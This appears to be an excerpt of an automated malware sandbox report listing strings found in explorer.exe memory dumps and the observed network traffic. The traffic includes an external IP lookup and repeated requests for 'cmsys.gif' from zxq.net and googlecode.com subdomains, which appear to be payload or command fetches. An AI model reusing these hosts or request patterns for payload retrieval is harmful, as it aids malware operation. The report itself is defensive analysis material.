                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-450x280.png
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-768x478.png
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-10
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-15
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-30
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-45
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-76
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01.jp
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-includes/css/dist/block-library/style.min.css?ver=5.9.1
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-includes/wlwmanifest.xml
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-json/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fzxq.net%2Fwhat-happened-to-the-old-zxq-we
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-json/wp/v2/pages/187
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/write-for-us/
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/xmlrpc.php?rsd
                Source: unknownDNS traffic detected: queries for: 64.89.4.0.in-addr.arpa
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /what-happened-to-the-old-zxq-website/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
